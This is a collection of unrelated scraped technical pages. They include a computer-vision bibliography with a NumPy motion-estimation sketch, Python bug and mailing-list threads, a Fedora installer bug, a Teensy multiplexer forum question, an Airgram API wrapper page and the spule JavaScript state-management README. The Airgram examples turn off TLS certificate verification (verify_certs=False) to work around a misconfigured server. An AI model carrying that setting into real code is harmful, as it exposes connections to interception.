Faugeras, O., Fua, P., Hotz, B., Ma, R., Robert, L., Thonnat, M. and Zhang, Z.: 1992, Quantitative and qualitative comparison of some area and feature-based stereo algorithms, in W. Förstner and S. Ruwiedel (eds), Robust Computer Vision: Quality of Vision Algorithms, Wichmann, Karlsruhe, Germany.
Fua, P.: 1992, A parallel stereo algorithm that produces dense depth maps and preserves image features, Machine Vision and Applications. Accepted for publication.
Gennery, D. B.: 1989, Visual terrain matching for a Mars rover, Proc. IEEE Conf. Comput. Vision Pattern Recog., San Diego, CA.
Goldgof, D. B., Huang, T. S. and Lee, H.: 1988, Feature extraction and terrain matching, Proc. IEEE Conf. Comput. Vision Pattern Recog., Ann Arbor, Michigan.
Grimson, W.: 1985, Computational experiments with a feature based stereo algorithm, IEEE Trans. PAMI 7(1).
Gueziec, A. and Ayache, N.: 1992, Smoothing and matching of 3-D space curves, Proc. Second European Conf. Comput. Vision, Santa Margherita Ligure, Italy.
Haralick, R. et al.: 1989, Pose estimation from corresponding point data, IEEE Trans. SMC 19(6).
Hebert, M., Caillas, C., Krotkov, E., Kweon, I. S. and Kanade, T.: 1989, Terrain mapping for a roving planetary explorer, Proc. Int'l Conf. Robotics Automation.
Horn, B.: 1987, Closed-form solution of absolute orientation using unit quaternions, Journal of the Optical Society of America A 7.
Horn, B.
and Harris, J.: 1991, Rigid body motion from range image sequences, CVGIP: Image Understanding 53(1).
Kamgar-Parsi, B., Jones, J. L. and Rosenfeld, A.: 1991, Registration of multiple overlapping range images: Scenes without distinctive features, IEEE Trans. PAMI 13(9).
Kehtarnavaz, N. and Mohan, S.: 1989, A framework for estimation of motion parameters from range images, Comput. Vision, Graphics Image Process. 45.
Kriegman, D., Triendl, E. and Binford, T.: 1989, Stereo vision and navigation in buildings for mobile robots, IEEE Trans. RA 5(6).
Kweon, I. and Kanade, T.: 1992, High-resolution terrain map from multiple sensor data, IEEE Trans. PAMI 14(2).
Liang, P. and Todhunter, J. S.: 1990, Representation and recognition of surface shapes in range images: A differential geometry approach, Comput. Vision, Graphics Image Process. 52.
Matthies, L. and Shafer, S. A.: 1987, Error modeling in stereo navigation, IEEE J. RA 3(3).
Mayhew, J. E. W. and Frisby, J. P.: 1981, Psychophysical and computational studies towards a theory of human stereopsis, Artif. Intell. 17.
Menq, C.-H., Yau, H.-T. and Lai, G.-Y.: 1992, Automated precision measurement of surface profile in CAD-directed inspection, IEEE Trans. RA 8(2).
Milios, E. E.: 1989, Shape matching using curvature processes, Comput. Vision, Graphics Image Process. 47.
Navab, N. and Zhang, Z.: 1992, From multiple objects motion analysis to behavior-based object recognition, Proc. ECAI 92, Vienna, Austria.
Pavlidis, T.: 1980, Algorithms for shape analysis of contours and waveforms, IEEE Trans. PAMI 2(4).
Pollard, S., Mayhew, J. and Frisby, J.: 1985, PMF: A stereo correspondence algorithm using a disparity gradient limit, Perception 14.
Preparata, F. and Shamos, M.: 1986, Computational Geometry: An Introduction, Springer, Berlin, Heidelberg, New York.
Radack, G. M. and Badler, N. I.: 1989, Local matching of surfaces using a boundary-centered radial decomposition, Comput. Vision, Graphics Image Process. 45.
Robert, L.
and Faugeras, O.: 1991, Curve-based stereo: Figural continuity and curvature, Proc. IEEE Conf. Comput. Vision Pattern Recog., Maui, Hawaii.
Rodríguez, J. J. and Aggarwal, J. K.: 1989, Navigation using image sequence analysis and 3-D terrain matching, Proc. Workshop on Interpretation of 3D Scenes, Austin, TX.
Safaee-Rad, R., Tchoukanov, I., Benhabib, B. and Smith, K. C.: 1991, Accurate parameter estimation of quadratic curves from grey-level images, CVGIP: Image Understanding 54(2).
Sampson, R. E.: 1987, 3D range sensor-phase shift detection, Computer 20.
Schwartz, J. T. and Sharir, M.: 1987, Identification of partially obscured objects in two and three dimensions by matching noisy characteristic curves, Int'l J. Robotics Res. 6(2).
Szeliski, R.: 1988, Estimating motion from sparse range data without correspondence, Proc. Second Int'l Conf. Comput. Vision, IEEE, Tampa, FL.
Szeliski, R.: 1990, Bayesian modeling of uncertainty in low-level vision, Int'l J. Comput. Vision 5(3), 271-301.
Taubin, G.: 1991, Estimation of planar curves, surfaces, and nonplanar space curves defined by implicit equations with applications to edge and range image segmentation, IEEE Trans. PAMI 13(11).
Walker, M. W., Shao, L. and Volz, R. A.: 1991, Estimating 3-D location parameters using dual number quaternions, CVGIP: Image Understanding 54(3).
Walters, D.: 1987, Selection of image primitives for general-purpose visual processing, Comput. Vision, Graphics Image Process. 37(3).
Wolfson, H.: 1990, On curve matching, IEEE Trans. PAMI 12(5).
Zhang, Z.: 1991, Recalage de deux cartes de profondeur denses: L'état de l'art, Rapport VAP de la phase 4, CNES, Toulouse, France.
Zhang, Z.: 1992a, Iterative point matching for registration of free-form curves, Research Report 1658, INRIA Sophia-Antipolis.
Zhang, Z.: 1992b, On local matching of free-form curves, Proc. British Machine Vision Conf., University of Leeds, UK.
Zhang, Z.
and Faugeras, O.: 1991, Determining motion from 3D line segments: A comparative study, Image and Vision Computing 9(1).
Zhang, Z. and Faugeras, O.: 1992a, 3D Dynamic Scene Analysis: A Stereo Based Approach, Springer, Berlin, Heidelberg.
Zhang, Z. and Faugeras, O.: 1992b, Three-dimensional motion computation and object segmentation in a long sequence of stereo frames, Int'l J. Comput. Vision 7(3).
Zhang, Z., Faugeras, O. and Ayache, N.: 1988, Analysis of a sequence of stereo scenes containing multiple moving objects using rigidity constraints, Proc. Second Int'l Conf. Comput. Vision, Tampa, FL. Also as a chapter in R. Kasturi and R.C. Jain (eds), Computer Vision: Principles, IEEE Computer Society Press, 1991.

Color Figures

Fig. 21. Superposition of the two 3-D maps of a rock scene after a manual registration: front and top views.
Fig. 22. Test 1: Superposition of two 3-D maps before registration: front and top views.
Fig. 23. Test 1: Superposition of two 3-D maps after registration: front and top views.
Fig. 24. Test 2: Superposition of two 3-D maps before registration: front and top views.
Fig. 25. Test 2: Superposition of two 3-D maps after 40 iterations: front and top views.
Fig. 26. Test 2: Superposition of two 3-D maps after 80 iterations: front and top views.
Fig. 27. Test 3: Superposition of two 3-D maps before registration: front and top views.
Fig. 28.
Test 3: Superposition of two 3-D maps after registration: front and top views.
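The dual number quaternion method summarized in Appendix B condenses to a few dozen lines of linear algebra. The sketch below is an illustrative NumPy transcription of Equations 11-27 under this paper's convention (a 3-D point identified with the quaternion (x, 0); see note 7). It is not code from the paper, and the function names are mine.

```python
import numpy as np

def skew(v):
    """K(v): skew-symmetric matrix with skew(v) @ u == np.cross(v, u)."""
    return np.array([[0.0, -v[2], v[1]],
                     [v[2], 0.0, -v[0]],
                     [-v[1], v[0], 0.0]])

def Q_mat(q):
    """Equation 11; q = [q1, q2, q3, q4] with the scalar part last."""
    v, q4 = q[:3], q[3]
    M = np.empty((4, 4))
    M[:3, :3] = q4 * np.eye(3) + skew(v)
    M[:3, 3] = v
    M[3, :3] = -v
    M[3, 3] = q4
    return M

def W_mat(q):
    """Equation 12."""
    v, q4 = q[:3], q[3]
    M = np.empty((4, 4))
    M[:3, :3] = q4 * np.eye(3) - skew(v)
    M[:3, 3] = v
    M[3, :3] = -v
    M[3, 3] = q4
    return M

def motion_from_matches(xs, ys, w=None):
    """Weighted least-squares (R, t) such that y_i ~ R x_i + t (Equations 16-27)."""
    xs, ys = np.asarray(xs, float), np.asarray(ys, float)
    w = np.ones(len(xs)) if w is None else np.asarray(w, float)
    C1, C2 = np.zeros((4, 4)), np.zeros((4, 4))
    for wi, x, y in zip(w, xs, ys):
        xq, yq = np.append(x, 0.0), np.append(y, 0.0)  # point as quaternion (x, 0)
        C1 -= 2.0 * wi * Q_mat(yq).T @ W_mat(xq)       # Equation 17
        C2 += 2.0 * wi * (W_mat(xq) - Q_mat(yq))       # Equation 18
    Wsum = w.sum()                                     # Equation 19
    A = 0.5 * (C2.T @ C2 / (2.0 * Wsum) - C1 - C1.T)   # Equation 26
    eigvals, eigvecs = np.linalg.eigh(A)               # ascending eigenvalues
    q = eigvecs[:, -1]              # eigenvector of the largest eigenvalue
    s = -C2 @ q / (2.0 * Wsum)      # Equation 24
    v, q4 = q[:3], q[3]
    R = (q4**2 - v @ v) * np.eye(3) + 2.0 * np.outer(v, v) + 2.0 * q4 * skew(v)  # Eq. 14
    t = (W_mat(q).T @ s)[:3]        # Equation 15: t is the vector part of p
    return R, t
```

Note that the sign ambiguity of the eigenvector is harmless: replacing q by -q flips s as well, leaving both R and t unchanged.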
http://docplayer.net/280785-Iterative-point-matching-for-registration-of-free-form-curves-and-surfaces.html
Created on 2010-03-02 21:26 by Matt.Gattis, last changed 2010-08-02 16:49 by pitrou. This issue is now closed.

If you do:

    import io, mmap
    b = io.BytesIO("abc")
    m = mmap.mmap(-1, 10)
    m.seek(5)
    b.readinto(m)

m is now:

    'abc\x00\x00\x00\x00\x00\x00\x00'

Basically there is no way to readinto/recv_into an arbitrary position in an mmap object without creating a middle-man string.

If you want to slice into a writable buffer, you can use a memoryview:

    >>> b = io.BytesIO(b"abc")
    >>> m = mmap.mmap(-1, 10)
    >>> b.readinto(memoryview(m)[5:])
    3
    >>> m[:]
    b'\x00\x00\x00\x00\x00abc\x00\x00'

This only works on 3.x, though. As for changing the mmap buffer implementation, it would break compatibility and is therefore not acceptable, sorry.
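For anyone retrying this today: the reporter's snippet is Python 2 (str literal, and readinto() ignores the mmap's seek position and writes at offset 0). The memoryview workaround from the reply, re-run here as a self-contained Python 3 snippet:

```python
import io
import mmap

b = io.BytesIO(b"abc")
m = mmap.mmap(-1, 10)

# readinto() fills the buffer from position 0 regardless of m.seek();
# slicing a memoryview gives a writable window starting at the desired offset.
n = b.readinto(memoryview(m)[5:])

assert n == 3
assert m[:] == b"\x00\x00\x00\x00\x00abc\x00\x00"
```

No intermediate bytes object is created: the BytesIO writes directly into the mapped memory through the sliced view.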
https://bugs.python.org/issue8042
(Extra copy to the list, since Google Groups breaks the recipient list :P)

inspect.Signature.bind() supports this in Python 3.3+. For earlier versions, Aaron Iles backported the functionality on PyPI as "funcsigs".

You can also just define an appropriate function, call it as f(*args, **kwds) and return the resulting locals() namespace.

Cheers,
Nick.

On 19 Sep 2013 04:39, "Neil Girdhar" <mistersheik at gmail.com> wrote:
> As far as I know, the way that arguments are mapped to a parameter
> specification is not exposed to the programmer. I suggest adding a
> PassedArgSpec class having two members: args and kwargs. Then,
> inspect.ArgSpec can take an argument specification and decode the
> PassedArgSpec (putting the right things in the right places) and return a
> dictionary with everything in its right place.
>
> I can only think of one use for now, which is replacing "arguments" in the
> returned tuple of __reduce__ and maybe allowing it to be returned by
> "__getnewargs__". It might also be nice to store such argument
> specifications instead of the pair args, kwargs when storing them in lists.
>
> Best,
>
> Neil
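For reference, the Python 3.3+ API Nick mentions can be exercised like this; the `connect` function is my own throwaway example, not something from the thread:

```python
import inspect

def connect(host, port=5432, *args, timeout=None, **kwargs):
    """A throwaway function used only to show the bound-arguments mapping."""

# Map call arguments onto the function's parameters without calling it.
bound = inspect.signature(connect).bind("db.local", 5433, retries=3)
bound.apply_defaults()

print(bound.arguments)
# On Python >= 3.9 this is a plain dict in parameter order:
# {'host': 'db.local', 'port': 5433, 'args': (), 'timeout': None,
#  'kwargs': {'retries': 3}}
```

bind() raises TypeError on a call that would not match the signature, so it also doubles as an argument validator.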
https://mail.python.org/pipermail/python-ideas/2013-September/023238.html
Red Hat Bugzilla – Bug 152610 – kickstart fails with python errors
Last modified: 2007-11-30 17:11:02 EST

Description of problem:
I have a proven kickstart setup where I install via the url method from a local webserver. I dumped the new FC4-1 isos into a directory to use as the install base. The system boots and attempts to run anaconda, but falls on its face before doing anything meaningful.

How reproducible:
Boot the boot.iso in the FC4-1 images directory of the CDs.

Steps to Reproduce:
1. Boot to a kickstart that references FC4-1.

Actual results:
The output on the screen looks something like this:

    Running anaconda, the Fedora Core system installer - please wait...
    Could not find platform independent libraries <prefix>
    Consider setting $PYTHONHOME to <prefix>[:<exec_prefix>]
    'import site' failed; use -v for traceback
    Traceback (most recent call last):
      File "/usr/bin/anaconda", line 28, in ?
        import sys, os
    ImportError: No module named os
    install exited abnormally
    sending termination signals...done
    sending kill signals...done

...it halts (but doesn't power off) after this point...

Expected results:
System install based on the kickstart file.

Additional info:

Created attachment 112472 [details] file list
This is a list of files in the directory that I am pointing kickstart at.

Created attachment 112473 [details] file list (sorted)
sorted version of previous attachment

*** This bug has been marked as a duplicate of 147507 ***

This should be fixed in test2

Jeremy, this exact error message is back for me with boot.iso and linux text for ftp install. (minstg2.img 2006-02-07 7:16 - 24,264,704 B) (HP Omnibook 4150, 384 MB RAM).

F3: ... looking for USB mouse... Running anaconda script /usr/bin/anaconda
F4: ... <6>SGI XFS Quota Management subsystem <6>device-mapper: 4.5.0-ioctl (2005-10-04) initialised: dm-devel@redhat.com
https://bugzilla.redhat.com/show_bug.cgi?id=152610
Just a few quick updates:

1) Looks like the Castor article is going to a webzine rather than the website. I'll let you know...

2) Made some progress on PUNT, which is a set of filters for converting namespace prefixes in XML to encoded URIs. It results in really ugly documents, but it may be a useful tool for those still operating in namespace-unaware environments (or where namespaces are just handled badly by some third-party joker who won't listen to you).

3) Thinking more about a typed metalanguage (TML) that is backwards compatible with XML. I've had a couple of interesting debates with people on xml-dev of late. For instance, Simon St. Laurent is a big fan of loose constraints, lexically specified, whereas I'm more the semantically-understood-datatypes advocate. The twain have to meet somewhere, though. Further exploration of the TML concept should help delineate those boundaries. The XML Schema datatypes guys have pointed the way, although they got lost somewhere on the trail, probably attributable to politics and compromise (and deadline pressure). There's something to be said for being a cowboy.
http://www.advogato.org/person/jeffalo/diary/5.html
I currently have thirteen buttons hooked up to two digital pins (0, 1) on a Teensy 3.2 through two 74HC4051 muxes. The muxes are controlled by pins 10, 11, 12. MUX 1 has eight pushbuttons and MUX 2 five, with the spare pins tied to ground. I am using the MIDI_Controller library from here: the circuit is essentially the same as the one shown here, but with only two multiplexers:

Some of the buttons are DigitalLatch, some are simple Digital (see code below).

Everything is working as it should up to a point. However, the DigitalLatch buttons on pin 7 and pin 3 of MUX 1 seem to alternate between firing the two MIDI notes assigned to these pins at a very fast rate when either button is pushed. After much playing around, I am wondering if this might be an issue with the S2 control pin getting current even when it is nominally "low", causing the read to flicker between these pins? As per the datasheet, this is the difference between reading pin 7 and pin 3.

If this is the case, what can I do to solve it? I read someone suggesting that tying the control pins to ground via a high-value resistor might help. Is this a possible solution? I have already re-soldered the control pin connections, tried replacement buttons, and also tried moving the buttons on MUX 2 to different pins. One interesting result here was that removing the button from pin 7 and moving it to pin 4 of the mux seemed to cause the button on pin 6 to exhibit the same behavior.

Something even stranger seems to happen on the other multiplexer: on pin 7 of MUX 2 the Digital button appears to trigger MIDI note 16 as well as 12 (which it is allocated)... and it triggers both again at a very fast repeat, rather than as a held note. I am sort of hoping solving the first problem will also help with this though!

thanks in advance for any advice.
Code:

#include <Encoder.h>
#include <MIDI_Controller.h>      // MIDI controller library
#include <ResponsiveAnalogRead.h> // analog smoothing
#include <Bounce.h>               // 'de-bouncing' switches -- removing electrical chatter as contacts settle
// usbMIDI.h library is added automatically when code is compiled as a MIDI device

using namespace ExtIO; // use standard Arduino digitalWrite, pinMode, etc.

// Creating the muxes:
// AnalogMultiplex(pin_t analogPin, { pin_t addressPin1, addressPin2, ... addressPinN })
//   analogPin:   the analog input pin connected to the output of the multiplexer
//   addressPin#: the digital output pins connected to the address lines of the multiplexer
AnalogMultiplex buttonsmux1(1, { 10, 11, 12 });
AnalogMultiplex buttonsmux2(0, { 10, 11, 12 });

// Create 8 new instances of the class 'DigitalLatch', on the 8 pins of buttonsmux1
DigitalLatch Arcadebuttons[] = {
  {buttonsmux1.pin(0), 0, 14, 127, 10},
  {buttonsmux1.pin(1), 1, 14, 127, 10},
  {buttonsmux1.pin(2), 2, 14, 127, 10},
  {buttonsmux1.pin(3), 3, 14, 127, 10},
  {buttonsmux1.pin(4), 4, 14, 127, 10},
  {buttonsmux1.pin(5), 5, 14, 127, 10},
  {buttonsmux1.pin(6), 6, 14, 127, 10},
  {buttonsmux1.pin(7), 7, 14, 127, 10},
};

// Extra two arcade buttons
DigitalLatch Arcadebuttonextras[] = {
  {buttonsmux2.pin(3), 8, 14, 127, 10},
  {buttonsmux2.pin(4), 9, 14, 127, 10},
};

// Create 3 new instances of the class 'Digital' for navigation buttons, on 3 pins of buttonsmux2
Digital Navigation[] = {
  {buttonsmux2.pin(5), 10, 14, 127},
  {buttonsmux2.pin(6), 11, 14, 127},
  {buttonsmux2.pin(7), 12, 14, 127},
};

// CONSTANT VALUES
const static byte Channel_Volume = 0x7;  // controller number 7 is defined as Channel Volume in the MIDI implementation
const static size_t analogAverage = 8;   // use the average of 8 samples to get smooth transitions and prevent noise
const static byte velocity = 127;        // the maximum velocity, since MIDI uses a 7-bit number for velocity
const static int latchTime = 3000;       // the amount of time (in ms) the note is held on; see the documentation
const static byte C4 = 60;               // note number 60 is defined as middle C in the MIDI implementation
const static byte E0 = 16;               // so note number 16 is E0
const byte Channel = 14;                 // MIDI channel 14
const byte Controller = 0x14;            // MIDI controller number
const int speedMultiply = 1;             // no change in speed of the encoder

void setup() {
}

void loop() {
  MIDI_Controller.refresh();
}
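The S2 suspicion can be sanity-checked with plain arithmetic. On a 74HC4051 the selected channel is S0 + 2·S1 + 4·S2, so channels 3 (binary 011) and 7 (binary 111) differ only in the S2 bit. A small Python sketch (not Arduino code, just the addressing math from the datasheet) shows that a flaky S2 line makes exactly that pair of channels swap:

```python
def hc4051_channel(s0, s1, s2):
    """Channel a 74HC4051 connects for the given address-line levels (0 or 1)."""
    return s0 + 2 * s1 + 4 * s2

# Intending to read channel 3 (S2=0, S1=1, S0=1):
intended = hc4051_channel(1, 1, 0)

# If S2 floats high even though it is driven "low", the mux
# actually connects channel 7 -- the exact pair seen misbehaving.
with_glitch = hc4051_channel(1, 1, 1)

print(intended, with_glitch)
```

Any pair of channels whose addresses differ only in one bit (3/7, 2/6, 1/5, 0/4 for S2) would flicker the same way, which also fits the pin 4 / pin 6 observation above.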
https://forum.pjrc.com/threads/56523-Triggering-multiple-notes-from-single-button-press-mxltiplexer-74hc4051?s=f9cf5d806126ff871619d26af8093c5e&p=208569&viewfull=1
Wrapper for the airgram api

Project description

A python wrapper for making calls to the Airgram API, which enables you to send push notifications to your mobile devices. Since it is a very shallow wrapper, you can refer to the official API reference for details on the functions.

Examples

At the time of writing (2015-08-20), Airgram was serving the wrong certificates, which are intended for herokuapp.com. Because of this, certificate verification needs to be turned off.

Using as a guest

from airgram import Airgram

ag = Airgram(verify_certs=False)

# Send a message to a user
ag.send_as_guest("your@email.com", "Test message from Airgram API", "")

Using with an authenticated airgram service

from airgram import Airgram

ag = Airgram(key="MY_SERVICE_KEY", secret="MY_SERVICE_SECRET", verify_certs=False)

# Subscribe an email to the service
ag.subscribe("your@email.com")

# Send a message to a subscriber
ag.send("your@email.com", "Hello, how are you?")

# Send a message to ALL subscribers
ag.broadcast("Airgram for python is awesome", url="")

History

0.1.3 (2015-08-25) - BugFix: added MANIFEST.in (fixes install problem)
0.1.2 (2015-08-21) - BugFix: correct wrong API URL
0.1.1 (2015-08-21) - Add module logger; add class logger; functions throw AirgramException on failure
0.1.0 (2015-07-30) - First release on PyPI
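The package's internals are not shown here, but a shallow wrapper like this is easy to sketch. The class below is a hypothetical reconstruction based only on the four methods documented above; it builds the payload each call would post without doing any network I/O (the service itself is long gone), and the endpoint paths are assumptions, not the real package's API:

```python
class AirgramSketch:
    """Hypothetical reconstruction of a shallow Airgram-style wrapper.
    No network I/O: each method returns the payload it would have posted."""

    BASE = "https://api.airgramapp.com/1"  # assumed endpoint, for illustration only

    def __init__(self, key=None, secret=None, verify_certs=True):
        self.auth = (key, secret) if key and secret else None
        self.verify_certs = verify_certs

    def _payload(self, endpoint, **fields):
        return {"url": f"{self.BASE}/{endpoint}", "auth": self.auth,
                "verify": self.verify_certs, "data": fields}

    def send_as_guest(self, email, msg, url=None):
        return self._payload("send_as_guest", email=email, msg=msg, url=url)

    def subscribe(self, email):
        return self._payload("subscribe", email=email)

    def send(self, email, msg, url=None):
        return self._payload("send", email=email, msg=msg, url=url)

    def broadcast(self, msg, url=None):
        return self._payload("broadcast", msg=msg, url=url)

ag = AirgramSketch(key="K", secret="S", verify_certs=False)
print(ag.send("your@email.com", "Hello, how are you?"))
```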
https://pypi.org/project/airgram/
README

spule

Spule ~ Scottish: [ˈspül] variant of Spool ~ German: [ˈʃpuːlə] Coil, Reel

Introduction: State MGMT and Side-Effects

All too often, state management (MGMT) is an "add-on", an afterthought of a UI/API. However, you may realize by now - if you've spent any significant time using the available MGMT libraries - that state (and coupled effects) is the most infuriating source of complexity and bugs in modern JavaScript apps. Spule aims to be far simpler than the status quo by starting with a simple abstraction over the hardest parts and working outwards to the easier ones.

Getting Started

npm install spule

What if you could compose your app logic on an ad-hoc basis without creating spaghetti code? Yes, it's possible - and it's one of the primary goals of spule.

At its core, spule is async-first. It allows you to write your code using async/await/Promises in the most painless and composable way you've ever seen. spule does some stream-based (FRP) gymnastics under the hood to choreograph everything; however, you won't have to worry about the implementation details. spule aims at being approachable to those who have zero experience with streams. Let's see some examples.

Commands

At the core of spule is an async spooler (hence the name), which receives "Commands" and responds to them. We'll go into more detail later, but let's jump right in with some copy/paste examples.
Stupid Command example:

// src/genie.js
import { run$, registerCMD } from "spule"

const GENIE = registerCMD({
  sub$: "GENIE",
  args: "your wish",
  work: x => console.log("🧞♀️:", x, "is my command")
})

// work handler is digested during registration
console.log(GENIE) // => { sub$: "GENIE", args: "your wish" }

run$.next(GENIE) //=> 🧞♀️: your wish is my command

registerCMD takes a config Object, attaches the work callback to a pubsub stream for you and returns a Command Object that you can use to trigger that callback (subscription based on the Command sub$ value). This Object signature is not only handy as a means to manage a lot of Commands, but it also avails spule's superpower: Tasks.

Tasks

Tasks, like Commands, are just data (including Lambdas). Commands are Objects and Tasks are Arrays of Commands. This allows them to be dis/reassembled and reused on an ad-hoc basis. Let's compose our GENIE Command with an API call...

// src/genie.js (continued)

// 1st Command args' Object initializes an accumulator
export const GET__FORTUNE = [
  { args: { api: "" } },
  // lambda args have access to the accumulation
  {
    args: ({ api }) => fetch(api).then(r => r.json()),
    reso: (acc, { fortune }) => ({ fortune }),
    erro: (acc, err) => ({ error: err })
  }
]

const FORTUNE__GENIE = [
  ...GET__FORTUNE,
  { ...GENIE, args: ({ fortune }) => fortune }
]

run$.next(FORTUNE__GENIE)
// => 🧞♀️: Deliver yesterday, code today, think tomorrow. is my command

Logic as Data™

As you can see - within a Task - the only required key on a Command Object is the args key, which provides the signal-passing functionality between intra-Task Commands. The only Command that actually does any work here is GENIE (the one with a registered sub$).

🔍 UTH (Under the Hood): This intra-Task handoff works via an async reduce function. Any Object returned by a Command is spread into an "accumulator" that can be accessed by any following Commands within a Task (via a unary Lambda in the args position).
Hopefully you get a sense of how handy this is already. Have you ever wished you could pull out and pass around a .then from one Promise chain to compose with another? Well, now you - effectively - can. Not only can you recombine Promises with Tasks, you can also recombine side-effecting code. This is "Logic as Data"™. And, yes, it gets even better. It may be obvious that you can de/compose or spread together Tasks (they're just Arrays). But what if the shape/signature of your "Subtask" doesn't match that of the Task that you'd like to spread it into?

Subtasks

// src/zoltar.js
import { run$, registerCMD } from "spule"
import { GET__FORTUNE } from "./genie"

const ZOLTAR = registerCMD({
  sub$: "ZOLTAR",
  args: { zoltar: "make your wish" },
  work: ({ zoltar }) => console.log("🧞♂️:", zoltar)
})

const TOM = registerCMD({
  sub$: "TOM",
  args: { tom: "👶: I wish I were big" },
  work: ({ tom }) => console.log(tom)
})

/**
 * use a unary function that takes the accumulator
 * Object and returns a Task
 */
const ZOLTAR__X = ({ zoltar }) => [
  { ...TOM, args: { tom: "🧒: I wish I was small again" } },
  { ...ZOLTAR, args: { zoltar } }
]

const BIG__MORAL = [
  ZOLTAR,
  TOM,
  { ...ZOLTAR, args: { zoltar: "your wish is granted" } },
  ...GET__FORTUNE,
  ({ fortune }) => ZOLTAR__X({ zoltar: fortune })
]

run$.next(BIG__MORAL)
//=> 🧞♂️: make your wish
//=> 👶: I wish I were big
//=> 🧞♂️: your wish is granted
//=> 🧒: I wish I was small again
//=> 🧞♂️: Growing old is mandatory; growing up is optional.

Just as using a unary args function in a Command allows passing state between Commands, you can use a unary function within a Task to pass state between Subtasks.

Goodbye 🍝 Code!

This gives new meaning to the term "side-effect" as - in spule - side-effects are kept on the side and out of the guts of your logic. This frees you from the pain that tight-coupling of state, side-effects and logic entails.
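The "async reduce" handoff described earlier is small enough to model outside the framework. Here is a rough Python analogue (not spule's actual implementation): each Command's args is either a dict merged into an accumulator or a unary function of the accumulator, awaited if it returns a coroutine, and dispatched only when the Command carries a sub$:

```python
import asyncio

async def run_task(task, dispatch=lambda sub, value: None):
    """Toy analogue of spule's intra-Task accumulator.
    `task` is a list of command dicts; `dispatch` stands in for pubsub."""
    acc = {}
    for cmd in task:
        args = cmd["args"]
        value = args(acc) if callable(args) else args
        if asyncio.iscoroutine(value):      # Promise-like step
            value = await value
        if isinstance(value, dict):         # spread the result into the accumulator
            acc = {**acc, **value}
        if "sub$" in cmd:                   # only registered commands do work
            dispatch(cmd["sub$"], value)
    return acc

async def fake_fetch():                     # stands in for the fortune API call
    return {"fortune": "code today"}

log = []
task = [
    {"args": {"api": "https://example.test"}},
    {"args": lambda acc: fake_fetch()},
    {"sub$": "GENIE", "args": lambda acc: acc["fortune"]},
]
result = asyncio.run(run_task(task, dispatch=lambda s, v: log.append((s, v))))
print(result, log)
```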
Every feature is strongly decoupled from the others, providing a DX that is versatile, modular and composable.

TODO: IMAGE(s) ♻ Framework Architecture

Command Keys

The SET_STATE Command (built-in): TODO

Shorthand Symbols Glossary (spule surface grammar)

Now that we've seen some examples of Commands and Tasks in use, we'll use a shorthand syntax for describing Task/Command signatures as a compact conveyance when convenient.

Router

One of the things that can be really frustrating to users of some frameworks is either the lack of a built-in router or one that seems tacked-on after the fact. spule was built with the router in mind. spule provides two routers:

- A DOM router (for clients/SPAs)
- a data-only router (for servers/Node).

🔍 UTH: The DOM router is built on top of the data-only router. Both are implemented as Tasks.

URL = Lens

What is a URL? It's really just a path to a specific resource or collection of resources. Before the glorious age of JavaScript, this - in fact - was the only way you could access the Internet. You typed in a URL, which pointed to some file within a directory stored on a computer at some specific address. Taking cues from the best parts of functional programming, spule's router is really just a lens into the application state. As natural as URLs are to remote resources, this router accesses local memory using paths.

At its core, the spule router doesn't do very much. It relies on a JavaScript Map implementation that retains the Map API, but has value semantics - rather than identity semantics (aka: PLOP), which the native Map implementation uses - for evaluating equality of non-primitive Map keys (e.g., for Object/Array keys). This - dare I say better - implementation of Map avails something that many are asking for in JS: pattern matching.
With pattern matching, we don't have to resort to any non-intuitive/complex/fragile regular expression gymnastics for route matching. To start, we'll diverge away from the problem at hand for just a moment and look at some of the benefits of a value-semantic Map... Value semantics have so many benefits. As a router, just one. So, how might we apply such a pattern matching solution against the problem of routing?

// src/routes.js
import { EquivMap } from "@thi.ng/associative"

const known = x => ["fortunes", "lessons"].find(y => y === x)
const four04 = [{ chinese: 404, english: 404 }]
const home = [{ chinese: "家", english: "home" }]

const url = ""
const query = (a, b) => fetch(`${url}${a}?limit=1&skip=${b}`).then(r => r.json())

export const match = async path => {
  const args = path ? path.split("/") : []
  let [api, id] = args
  const data =
    new EquivMap([
      // prevent unneeded requests w/ thunks (0)=>
      [[], () => home],
      [[known(api), id], () => query(api, id)], // guarded match
      [[known(api)], () => query(api, 1)]       // guarded match
    ]).get(args) || (() => four04)
  // call the thunk to trigger the actual request
  const res = await data()
  const r = res[0]
  return r.message || `${r.chinese}: ${r.english}`
}

const log = console.log

match("fortunes/88").then(log)
//=> "A handsome shoe often pinches the foot."
match("").then(log)
//=> "家: home"
match("lessons/4").then(log)
//=> "请给我一杯/两杯啤酒。: A beer/two beers, please."
match("bloop/21").then(log)
//=> "404: 404"

If you can see the potential of pattern matching for other problems you may have encountered, you can check out the more detailed section later. We can create pattern-matching guards by using an in situ expression that either returns a "falsy" value or the value itself. Even if you don't end up using spule, you may find the @thi.ng/associative library very handy!

Now, let's integrate our router. Everything pretty much stays the same, but we'll need to make a few changes to mount our router to the DOM.
// src/routes.js
import { parse } from "spule"
...
export const match = async path => {
-  const args = path ? path.split("/") : [];
+  const args = parse(path).URL_path
  let [api, id] = args
  const data =
    new EquivMap([
      [[], () => home],
      [[known(api), id], () => query(api, id)],
      [[known(api)], () => query(api, 1)]
    ]).get(args) || (() => four04)
  const res = await data()
  const r = res[0]
-  return r.message || `${r.chinese}: ${r.english}`
+  return {
+    URL_data: r.message || `${r.chinese}: ${r.english}`,
+  }
}
...

TODO: It's beyond the scope of this introduction to spule to dive into the implementation of our next example. It will work, but try it out for yourself on your own (toy) problem in order to get a feel for it.

UI-first or UI-last?

As you may deduce - if you've gotten this far - there's a heavy data-oriented/biased approach taken by spule. In fact, we argue that the UI should be informed by the data, not the other way around. I.e., start with building out the application state for your various routes and then frame it with a UI. Think of the application state as your information architecture and the UI as your information interior design. While it's possible to start with the design and end with an information architecture, the customer journey can suffer from an over-reliance on "signage" for helping them navigate through the information. It's not uncommon to start an application/site design with a "site map". Think of this approach like a site map on steroids.

Advanced

ADVANCED USE ONLY 👽

HURL tries to hide the stream implementation from the user as much as possible, but allows you to go further down the rabbit hole if so desired. You may send Commands to a separate stream of your own creation during a Task by using a nullary ("thunk") (0)=> function signature as the args value of a Command.
If this is the case, the spool assumes the sub$ key references a stream and sends the return value of the thunk to that stream. This feature can come in handy for "fire and forget" events (e.g., logging, analytics, etc.):

import { stream } from "@thi.ng/rstream"
import { map, comp } from "@thi.ng/transducers"

// ad-hoc stream
let login = stream().subscribe(
  comp(
    map(x => console.log("login ->", x)),
    map(({ token }) => loginToMyAuth(token))
  )
)

